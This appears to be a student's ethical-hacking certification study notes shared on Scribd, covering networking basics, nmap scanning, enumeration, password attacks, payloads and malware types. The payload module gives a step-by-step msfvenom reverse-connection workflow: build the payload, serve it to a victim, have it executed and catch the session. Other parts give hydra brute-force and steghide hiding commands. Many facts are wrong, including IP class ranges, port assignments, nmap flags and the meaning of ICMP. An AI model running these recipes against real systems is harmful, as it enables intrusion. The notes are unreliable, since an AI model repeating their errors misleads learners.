0% found this document useful (0 votes)
60 views47 pages

CEH Notes

The document provides an overview of ethical hacking, networking, IP addressing, and various protocols, emphasizing the importance of identifying and fixing vulnerabilities in systems. It details the OSI model, types of network devices, and the phases of ethical hacking, along with terminology and security policies. Additionally, it covers risk management, incident management, and security standards relevant to information security.

Uploaded by

bookpdf092
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
60 views47 pages

CEH Notes

The document provides an overview of ethical hacking, networking, IP addressing, and various protocols, emphasizing the importance of identifying and fixing vulnerabilities in systems. It details the OSI model, types of network devices, and the phases of ethical hacking, along with terminology and security policies. Additionally, it covers risk management, incident management, and security standards relevant to information security.

Uploaded by

bookpdf092
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 47

CEH Certification

Ethical Hacking sometimes called as Penetration Testing is an act of intruding/


penetrating into system or networks to find out threats, vulnerabilities in those
systems which a malicious attacker may find and exploit causing loss of data,
financial loss or other major damages. The purpose of ethical hacking is to
improve the security of the network or systems by fixing the vulnerabilities
found during testing. Ethical hackers may use the same methods and tools used
by the malicious hackers but with the permission of the authorized person for
the purpose of improving the security and defending the systems from attacks
by malicious users.Ethical hackers are expected to report all the vulnerabilities
and weakness found during the process to the management.

1/47
Networking
Networking is used to communicate between 2 or other 2 difference network.
There are some network topology..

1) Star Topology : It is used for Broadcasting. HUB are use in star topology.
2) Mesh Topology : In mesh topology all network are connected to each other. And it
cost more.
3) Hybrid Topology : It is a collection of 2 or more topology. And it cost more.
4) Ring Topology : It allows more device to br atteched to a single central hub, does it's
incress the distance that is travel by signal to come to the divices.
( It use Token system ).
5) Tree Topology : It use as a child parents. It use HUB for the long distance and it cost
more.
6) Bus Topology : All network are connected to the single line. If one network fail then
all the network fails.

Difference between Data & Information :


Data is in the row format, When we process the data the outcome call as the
information.

2/47
IP Address
IP Address :
An IP Address is a 32bit sequence of 1 & 0 ( Binary). An IP Address is a way to identify
machin on a network. It is a unique identifier.

IP Uses :
It is used to connect to the other computer. It allows transfer of the file and e-mail.
Internet Protocol is used for communication data between the network over the network.

There are five class of IP Address :


Class A : Reserve for government and big level company. It support 16M host on each of
127 network.
( 1.0.0.1 - 126.255.255.254 ) ( 126.255.255 Is Subnet & 254 Is Host )
1.0.0.1 = 1 Is network & 0.0.1 Is Host.

Class B : Reserve for big and medium company. It support 65,000 host on each 16,000
network.
( 128.0.0.0 - 191.255.255.255 )
128.0.0.0 = 128.0 Is Network & 0.0 Is Host.

Class C : Reserve for the medium or small company or small network. It support 254 host.
( 192.0.0.0 - 233.255.255.255 )
192.0.0.0. = 192.0.0 Is Network & 0 IS Host.

Class D : Reserve for Multicasting.


( 244.0.0.0 - 239.255.255.255 )

Class E: Reserve for future use and experimantal use.


( 240.0.0.0 - 254.255.255.255 )

192.168.0.1 There are two types of IP Address Public & Private.

There are two version of IP Address :


1) IPV4 : It consist of 32bit ( e.g : 192.168.0.1 ) 4B Address can connect to IPV4.
2) IPV6 : It consist of 128bit. It is in hexadecimal. ( e.g : fe80::a299:9bff:fe18:50d1 )

Type 0f IP : Static & Dynamic

Static : It is mannually inputed by the network addmistration. Managable for small


network require carefully check to avoid duplication.

Dynamic : Assign by server derivied automaticaly from a rang of address.

127.0.0.1 is look back internet address as a local host that is used to esatblish an IP
connection to the same machin or the computer being use by the end user.

3/47
4/47
MAC Address
• Stands for "Media Access Control Address," and no, it is not related Apple Macintosh
computers. A MAC address is a hardware identification number that uniquely identifies each
device on a network. The MAC address is manufactured into every network card, such as an
Ethernet card or Wi-Fi card, and therefore cannot be changed.
• Because there are millions of networkable devices in existence, and each device needs to
have a unique MAC address, there must be a very wide range of possible addresses. For this
reason, MAC addresses are made up of six two-digit hexadesimal numbers, separated by colons.
For example, an Ethernet card may have a MAC address of 00:0d:83:b1:c0:8e. Fortunately,
you do not need to know this address, since it is automatically recognized by most networks.

5/47
TCP & UDP Protocol
There are two logical protocol. TCP & UDP
TCP : Transmission Contol Protocol.
TCP is connection orianted protocol. It provide extensive error cheacking machanizam.
TCP is comparivatively slow than UDP. TCP is relaible as it garenty delivery of data to the
destination.

UDP : User Datagram Protocol.


UDP is datagram orianted protocol. UDP has the only basic error cheacking
machaninzam. UDP is faster,simplar & moreefficient than TCP. The delivery of data to the
destination cannot be grantied to UDP.

There are 65,535 TCP & UDP port. Port are use for connecting to the server like HTTP,FTP

6/47
Types Of Ports & No
Verious type of port & there No.

01) HTTP : 80 ( Hyper text transfer protocol ).


02) FTP : 20 , 21 ( File transfer protocol ).
03) Tel Net : 23
04) SSH : 22 ( Secure shell ).
05) NTP : 123 ( Network time protocol ).
06) SMTP : 25 ( Simple mail transfer protocol ).
07) SNMP : 161 , 162 ( Simple network management protocol ). Internal Port
08) POP 3 : 110 ( Post office protocol 3 ).
09) IMAP : 143 ( Internet manage acces protocol ).
10) DNS : 53 ( Domain name system ).
11) DHCP : 67 , 68 ( Dynamic host configuration protocol ).
12) NET BIOS : 137 , 139
13) MSRCP : 135 ( Microsoft remote process call ).
14) SMB : 445 ( Server message block ( windows ) ). Used for Printer and other.
15) LDAP :389 ( Lightweight directory acces protocol ).
16) My SQL : 3306
17) HTTPS : 443 ( S : Secure socket layer. )
18) SNPP : 444 ( Simole network pagein protocol ).

7/47
OSI Model
OSI Model : The Open System Interconnection
It is created by International orgination for standatization ( ISO ). The OSI provide standard
computer system to be able to communicate with each other. OSi is referance model.

There are seven layer of OSI model, on each layer has it's own responsiblity.

Appliction layer ( 7th layer ) : Human computer interaction layer where application can
access the network services.

Presentation layer ( 6th layer ) : Insure that data is in a usable format and it's where
increption occur.

Session layer ( 5th layer ) : Maintain connection & is responsible for controlling port and
session.

Transport layer ( 4th layer ) : Transmit data using transmission protocol, including TCP &
UDP.

Netwoork layer ( 3rd layer ) : Network layer assign IP Address & deside which path the
data will take.

Data link llayer ( 2nd layer ) : Defone the format of the data on the network, error
detection and the error correction happen in this layer.

Phycial layer ( 1st layer ) : Transmt raw bit streem over the phycial medium.

TCP / IP Mode : ( 4 Layer )

1) Application layer - ( Presentation & Session Layer )

2) Transport layer

3) Internet layer

4) Network layer - ( Data link & Physical layer )

8/47
Network Devices
1) HUB : It is used to broadcast data.

2) Switch : It is use to send data perticularly to specific destination.

3) Router : It is a device like a switch that routs data packet base on their IP Address.

4) DSCP : Dynamic host configration protocol.

DORA ( Discover , Offer , Request , Akalodgement ) ( C-D , D-C , C-D , D-C )

5) DNS : Domain name system. ( DNS Qury , DNS Return ) ( C-D , D-C )

6) IDS : Intrusion detection system . It detect attack on network & alert the system.

7) IPS : Intrusion prevent system . It detect the attack and prevent the attack.

8) Firewall : Firewall is a device or software which prevent unauthorise attack and unauthorise
access. It has is own rule accordingly to our requirement and known as access control list ( ACL
).

9/47
File Permission
Three Type Of Permission :
1) Read = r - 4
2) Write = w - 2
3) Execute = x - 1

10/47
IMP Info.Sec
There are 5 Phase Of Ethical Hacking.

1) Information Gathering / Reconnance : To gather information about system or a


network.

2) Scanning : To check vulnarability of a system or a network and cheacking all the ports of
a network or system.

3) Ganning Access : To enter the system using information and the scanning through the
open port or other vulnarability.

4) Maintaining : To exit from the system.

5) Cover Track : Removeing log from the system to avoid the over flow in the system.

11/47
12/47
Terminology
Terminology Of Ethicl Hacking :

1) Vulnerability : Weakness of the system or the network.

2) Exploit : Taking advantage of the vulnerability and exploiting system or the network.

3) Payload : Paylode is the part of an exploit code that perform malicious action , such as
distroing , creating backdoor & hijcking computer.

4) Zero Day Attack : An attack that exploit computer application using vulnarability before
the software developer relese the patch for the vulnarability.

5) Doxing : Publishing the personal identification inforamtion about that individual collect
from the publical available database & social media.

6) Bot : Bot is the software application that can be control remotaly to execute or automate
pre-define task.

7) Daisy Chaining : It involve gainning access to one network / computer and using the
same inforamtion to gain access to multiple network of computer.

8) Hack Value : It is the notation amoung the hacker that some thing is worth doing or
intrestting.

13/47
Element
Element Of Information System. ( CIA )

1) Confidentiality : Assure that the information is accessiable only to those who has
authorise access .

2) Integrity : The trust worthyness of data or resourse interms of preventing improper an


unauthorise change.

3) Availblity : Resourse or data should be avalable to user where user wants to access the
data.

4) Authenticity : Refere to the charactistics of a communication , document , that insure


the quality of being geniun.

5) Non-Repudiation : Guarantee that the sender of the message cannot letter deny having
send the message & the recipient cannot deny havent recive the message.

14/47
Attack Vector
Top Information Security Attack Vector.

1) Cloud computing thrate.

2) Advance persistance thrate : Stelling informstion from the victim machine without
knowing the victim and user awair of it.

3) Viruses & Worms:


Virus : Virus is a self replacting software program that can capable of infecting a network
or a system with in a second after being launch.
Worms : That comes through the internet by lan or the network.

4) Malware / Ramsonware : Encrypt the information in the file that human can't read it.

5) Mobile Threat.

6) Bot Net : A bot net is a network of the compromise system used by attack to perfom
verious malicious attacking.

7) Insider Attack : It is an attack perform on a corporste network by an untrusted person


( Insider ) who has an authorise access to a network.

15/47
Type Of Hacker & Policy
Type Of Hacker:
1) Black Hat .
2) Whitr Hat.
3) Gray Hat.
4) Sucide Hacker.
5) Script Kiddie.
6) Cyber Terrorist.
7) State Sponcer Hacker.
8) Hacktivist.

Type Of Policy :

1) Promissive Policy : No restriction on system resource.

2) Permissive Policy : The permission policy restric only widly known dangerously attack or
behavior.

3) Prudent policy : The prudent policy ensure maximum & strongest security amoung
them , however it allows known , necessory risk , blocking services but individual enable services.

4) Peranoid Policy : Denied everything limiting internet usage.

16/47
Risk & Incident
Risk & Risk Management :

1) Risk Identification : To identify risk in system or network.

2) Risk Assisment : To measure impact of risk or data loss.

3) Risk Treatment : To solve the risk.

4) Risk Tracking : To find the way of risk.

5) Risk Review : To write a report on risk.

Incident & Incident Management : ( Live Attack. )

1) Incident Identification : To identify type of attack.

2) Incident Assisment : To measure impact of incident and any kind of data.

3) Incident Treatment : To solve or defence the attack.

4) Incident Tracking : To find how incident happen.

5) Incident Review : To write a report on incident happen.

17/47
VAPT And Security
VA & PT : To find the vulnerablity loophole and do testing on it.

1) Black Box : Information is not given to test.

2) White Box : Information is give for testing.

3) Grey Box : Partial information is given for testing.

Phase Of VAPT :

1) Pre-Attack : To find vulnerablity.

2) Attack : To exploit using the vulnerablity.

3) Post-Attack : To make a report on perform attack.

Security:

Security Audit : To check all the security for update and check for up-to-date.

Security Standerd :

1) PCI-DSS : Payment Card Industry Data Security Standerd.

2) HIPAA : Healt Insurance Portablity & Accuntablity Act.

3) SOX : Sarbanes - Oxley Act. : To protect shareholder & the general public from
accounting error & frodulent. ( To improve corporate governance & accountablity. )

4) ISO : International Orgination Of Standardization.

5) ITIL : Information Technology Infrastructure Library.

6) PCISSC : Payment Card Industry Security Standerd Council.

18/47
Model 2.
1) Footprinting & Reconnaissance.

19/47
Footprinting & Reconnaissance
Footprinting & Reconnaissance :

1) Shodan.io

2) Netcraft.com

3) Osintframework.com

4) web.archive.org

5) virustotal.com

6) haveibeenpwaned.com

For Terminal commend :

1) whois (site name )

2) whatweb -v ( site name )

3) sublistr3r -d ( site name )

4) dnsenum ( site name )

5) dirb https:// or http:// ( site name ) ( If CODE:200 , it open directly )

20/47
Module 3

Three-Way-Handshake [ (C) Sin - (S) Sin+Ack - (C) Ack ]

1) Syn = Synchronize : Initiate connect between host.

2) Ack = Acknowledgement : Ack recipt of a packet.

3) Psh = Push : Send all buffer data immediately.

4) Rst = Reset : Reset the connection.

5) Fin = Finish : There will be no more transaction.

6) Urg = Urgent : Data contain in the packet immediate.

21/47
.

22/47
Nmap

All the IP Address are example. ( Client to server - Server to Client


)

1) nmap 192.168.0.1/24 - Scan all subnet.

2) nmap -p- 192.168.0.1 - Scan all port of IP

3) nmap -sV 192.168.0.1 - Show all the service version of port.

4) nmap -p21 192.168.0.1 - To scan specific port.

5) nmap -p80-139 192.168.0.1 - To scan multiple port.

6) nmap -sT 192.168.0.1 - For TCP scan / full open scan / connect scan.

7) nmap -sS 192.168.0.1 - Stealth scan / Half open scan. [ (C) Sin - (S) Sin+Ack - (C)
Rst ] = Port is open.

[ (C) SIn - (S) Rst ] = Port


is close.

8) nmap -xX 192.168.0.1 - X-mas scan [ (C) Sin+Urg+Psh - (S) No


responce ] = Port is open.
[ (C) Sin+Urg+Psh - (S) Rst
] = Port is close.

9) nmap -O 192.168.0.1 - To scan OS system.

10) nmap -A 192.168.0.1 - Aggrassive scan.

11) nmap -sI 192.168.0.1 - Zombi scan.

12) nmap -sU 192.168.0.1 - For UDP scan [ No responce = Port is poen , Rst flage =
Port is close ]

13) nmap -V 192.168.0.1 - Scan Verbous mode.

14) nmap -Pn 192.168.0.1 - For Ping.

15) nmap -T4 192.168.0.1 - For time template (0 - 5 )

16) nmap -sA 192.168.0.1 - Acknowledgement scan [ Firewall ]

17) nmap -F 192.168.0.1 - To scan for fast result.

18) nmap -f 192.168.0.1 - To packet fragement. [ Filtered = Firewall is present ]

23/47
Counter Measure :

• Configure firewall & IDS rule to detect & block pings.


• The port scanning tool against host an the network to determine wether the firewall
property detect the port scanning acativity.
• Insure that router IDS & Firewall fermware are up-to-date to lattest relise.
• Use custom ruleset to lockdown the network & block unwanted port at the fireware.
• Insure that the anti-scanning & anti-scooping rule are configure.
• Perform TCP & UDP scanning long with ICMB prox against your orginazation IP Address yo
check the network configuration & it's available port

ICMB = In Charactor Message Board

24/47
Banner Grabbing

Banner Grabbing:
Banner Grabbing or OS finger printing is the meathod to determine the operating system
running on a remote target system.

Active Banner Grabbing :


Specially crafted packet are send to remote os & the responce are noted.
The responce are compare with the data base to determine the OS.
Responce from different OS varries due to difference in TCP/IP stack implimentation.

Passive Banner Grabbing :


Banner grabbing from error messages provide information such as tuype of server , type of
OS & SSL tool used by the target remote system.

Sniffing The Network Traffic :


Capturing & analysing the packet from the target enable an attacker to determine OS used
by the remote system.

Banner Grabbing From Page Extension :

Looking for an extension in the URL may assisting determine the application version.

e.g: ( .aspx ) IIS server & windows platform.

telnet 192.168.0.1 80 ( Press Enter ) [ 80 is port number ]


GET /HTTP/1.1 ( Press Enter 2 time ) [ To see server & OS ]

[ To connect telnet port, telnet port need to be open. ]

telnet 192.168.0.1 25 [ 25 is telnet port ]

eg: nc -vv www.cybervaultsec.com [ nc = netcat ( Used for listen) , -vv for verbous
mode ]

Counter Measure :

Display full banner to missguid attacker.


Turn of unnessessory services on the network host to limit the information discloser.
Use server mask tool to determine or change banner information.

25/47
26/47
.

27/47
Proxy,Anonymizer&Spoofing

Proxy Server :
• Proxy server is an application that can search as a intermediate for connecting with other
communication.
• To hide the source IP Address, to mask the actual source of the attack by a fake source
address of the proxy.
• To remotely access intranet & other website resources that are normaly off limit.
• To inturept all the request send by a user & transmit them to a third destination , hence
victim will only be able to identify the proxy server address.

Proxy Chainning :
• User request a source from destination.
• Proxy client hide the user system, connect to the proxy server, & passes thr request through
proxy server.
• The proxy server strick the user identification information & passes thr request to the next
proxy server.
• The process repeted by all the proxy server in the chain.
• At the end un-encrypted request pass through the server.

Anonymizer :
• An anonymizer remove all identifing information from the user computer while the user surf
the internet.
• Anonymizer make activity on internet untraceable.
• Anonymizer all cover you to bypass internet sensor.

Why Use Anonymizer :


• Privicy & anonymity run the procted from online attack.
• Access ristricted content.
• Bypass IDS & Firewall rule.

IP Spoofing Counter Measure :


• Encrypt allnetwork trafic using cryptrographic network protocol, such as IP Sec, TLS , SSH ,
HTTPS
• Use multiple firewall providing multilayer desktop protection.
• DO NOT Relay on IP based authantictation.
• Use random initial sequence number to private IP spoofing attack based on sequence
number spoofing.

Ingress Filtering :
Use router & firewall at your network paraater to filter in comming packet that appears to
come from an internal IP Address.

Egress Filtering :
Filter all outgoing packet with an invalid local IP Address at source add.

28/47
29/47
.

30/47
Module 4 (E-Num)

E-Numarition :
In the fase of e-numarition , An attacker innitiate active connection with the target system.
Ones attacker discover attack point it can gain unauthorise access using this collected
information to reach assets.

:~# cd /usr/share/nmap/scripts/

e.g : nmap -p139 --script nbstat.nse 192.168.0.1 [ Netbios port no : 139 ]

e.g: smtp-user-enem -U (.txt file) -M VRFY -t 192.168.0.1 [ (M = Mode) ,


(VRFY = Verify) , (t = target) ] [ smtp = mail server ]

enum4linux -a 192.168.0.1

Password Cracking :
hydra -P test.txt 192.168.0.1 snmp [ P = Password ]

after showing password

snmp-check -p161 -C Public 192.168.0.1

31/47
.

32/47
Module 5 ( Vulnerability)

Vulnerability Analysis :
• Vulnerability assisment is an examination of the abality of a system or application, including
current security procedure & control to with stand assault.
• It recognise measure & classified security vulnerability in the computer system , network &
communication channel.

Type Of Assessment : [ CVE & NVD = Vulnerability check


site. ]

1) Active Assessment : Uses network scanner to find host services and vulnerability.

2) Passive Assessment : ( Sniffing ) : Technique use to sniff the network traffic to find out
active system , network services , application & vulnerability present.

3) External Assessment : Access the network from hacker point of view to find out what
exploit & vulnerability are accessible to outside world.

4) Internal Assessment : A technique to scan the internal infrastructure to find out exploit
& vulnerability.

5) Host Based Assessment : Determine the vulnerability in s specific work station or server
by performing configuration level check to the command line.

6) Network Assessment : Determine the possible network security attacks, that may
occure on the orginization system.

7) Application Assessment : Test the web infrastructure for any miss-configuration &
known vulnerability.

8) Wireless Network Assessment : Determine the vulnerability in the orginization wireless


network.

9) Web Assessment : Static & Dynamic [ ( Static - No input ) & ( Dynamic - Input) ]

Vulnerability Management Life Cycle :

1) Creating base line.

2) Vuln Assessment : Physical security, firewall and other.

3) Risk Assessment : To measure risk level.

4) Remeadition : Tell them to take action and applay patch and other thing.

5) Verification : To verify all attack has done are not.

33/47
6) Monitoring : To check IDS , Impliment policy.

( Nikto for vuln scan )

34/47
.

35/47
Module 6 ( System Hacking )

System Hacking Methodology :

1) Cracking Password : Gainning Access.

2) Escalating Privilege :
- Vertical Privilege : Gainnig higher level access.
- Horizontal Privilege : Any access ( Same level )

3) Executing Application : Maintaining access.

4) Hiding File : To hide backdoor and other file.

5) Covering Tracks : Delete logs.

36/47
.

37/47
Password Attack

Password Attack :

1) Non-Electronic or Non-Technical Attack : Sholder surfing , EVAS dropping , Dumpstar.

2) Active Online Attack : Dictionary attack , Bruteforce attack , Hash injection.

3) Passive Online Attack : Wire sniffing , Packet sniffing , MiM attack , Bittercup.

4) Default Password : User , Admin , Root , etc.

5) Offline Attack : (Rainbow table ) : MD2 , MD4 , MD5 , SHA1 , SHA256 , SHA384 ,
SHA512 & other hashing format.

6) USB Attack.

7) LAN Manager : Symmetric key algorithm , ( Ticket use ).

8) NTLM : New Technology LAN Manager : Use different encryption for username &
password.

9) Curbrose Authentication : Symmetric key algorithm ( Protocol No 88 )

To Start Metasploit :

# service postgresql ( For first time )


# msfdb init ( For first time )
# msfconsole

1. search (--/--) [ (--/--) = For specific port , protocol ,service version and
other ]
2. use (--/--)
3. show options

38/47
.

39/47
Payloads

How To Create Payload :

1. msfvenom -l payloads - To select payload.

2. msfvenom -p ( selected payload ) lhost= ( Our IP ) lport= ( Abow 1024 ) -f (payload


format .exe and etc ) -o ( For payload name )

3. python -m SimpleHTTPServer - To start paython server.

4. msfconsole

5. use exploit/multi/handler

6. set payload (Selected payload name )

7. set lhost

8. set lport

- Go to the victim browser, type in the url our ip address : SimpleHTTPServer port NO.
-Download the payload in the victim machin , and execute payload in the victim machin.

9. Enter exploit or run in the msfconsole or msf framework after installing payload in victim
machin.

40/47
.

41/47
Executing Application

Executing Applications:

After gaining unauthorised access to the system, attacker may perform or execute following
activity.

• Installition of malware : To collect information to setup backdore to maintain access.


• To install cracker to crack password & script.
• To install keyloger for gathering information ways inputs divises such as keybord.
• To install trojen
• To install spyware.

Hiding Files :

Rootkit:

Types of rootkit:

• Application level rootkit : It replace regular application binary with trojen.


• Kernal level rootkit : It will add malicious code or replace orignal kernal.
• Bootloader level rootkit : It replace orignal bootloader with one controler by an attacker.
• Hardware & Firmware rootkit : This rootkit are build into a chipset for recevering stolen
computer,deleted data or render them useless.
• Hyperwise level rootkit : It will modify boot sequence of computer & loadhost OS as a
virtual machin.

Detecting Rootkit :

• Intigrating based rootkit : It compare snapshot of the file system boot record or memory
with a non-trusted base line.
• Signiture base detection : The technique compair charastristic of all system process &
executiable file with a database of a non-rootkit fingureprint.
• Heuristic / Behaviour base detection : Any division in the system normal activity or
behaviour amy indicate the presence of rootkit.
• Runtime executing path profiling : This technique compair runtime execution path of all
system process an executiable file before and after rootkit infection.
• Cross view base detection : Immunirate key element in the computer system such as file
system, process & registry keys & compair them to an algorithm use to
generate similer data set that dosenot rely on the common
API.
Any dispensory this two data set indicate the presence of
rootkit.

Counter Measure :
Update time to time , Use strong firewall and antivirus etc.

42/47
43/47
Stegnography & NTFS Data Stream

Stegnagrophy :
It is a technique of hiding a secrate message within an ordinary message & extracting it at
the destination to maintain confidentialiaty of data.

#:- steghide embes -ef (text file) -cf (image) -sf (output file name ) -p
(password) [ To Hide ]

#:- steghide extract -sf (image file) -xf (text file)

NTFS Data Stream :

• NTFS ADS ( Alternet Data Stream ) is a windows hidden stream which contain meta-
datafor the file, such as attribute , wordcount , authentication or name.
• ADS is the abality to fourk data into existing file without changing or altering their
functionality size or diaplay to file brousing utility.
• ADS allow an attacker to inject melicious code in the file an accessiable system & execute
them without being detected by user.

44/47
.

45/47
Module 7 ( Malware )

Malware :

Malware is a melicious software that damage or desiable copmuter system & gives limited
or full control of the system to the malware creater for the purpose of theft or froud.

Types Of Malware :

• Virus.
• Trojen Horse.
• Worms.
• Rootkit.
• Ransomeware.
• Botnet. and so on

Types Of Trojen :

• Botnet.
• E-Banking trojen.
• Proxy server trojen.
• Defesment trojen.
• Mobile trojrn.
• IOT trojen.

Stages Of Viruses :

• Design : Create viruses.


• Replication : Replication of progremme.
• Launch : Perform activity.
• Detection : Progremme or virus detection by anti-virus.
• Incorporation : The activity are block.
• Alumination : Remove virus.

46/47
Types Of Virus & Indication

Indication Of Virus :

• Process take more resources & time.


• Computer with no display.
• Unable to load OS.
• Computer closed down when progremme start.

Types Of Viruese :

1) System / Boot Sector Virus : Boot sector virus moves MBR to anathor location on the hard
disk and copyes it's self to the orignal location of MBR.

2) File Virus : File virus infect files which are executed or interpreted in the system.

3) Multipartite Virus : Multipartite virus infect the system boot sector & the executiable file at
the same time.

4) Micro Virus : It will infect the file through microsoft exel , word , and other microsoft file.

5) Cluster Virus : It modify directory table entry so that it's point user or system process to
the virus code insted of the actual progremme.

6) Stealth / Tunneling Virus : This viruses avoid the anti-virus software by interpreted it's
request to th OS.

7) Polymorfic Virus : Polymorfic code is a code that mutates file keeping the orignal algorithm
intact.

8) Metamorfic Virus : Metamorfic viruses rewrite themself completly each time they are to
infect new executiable.

9) Logic Bomb Virus : This virus triggered by responce to by events.

47/47

You might also like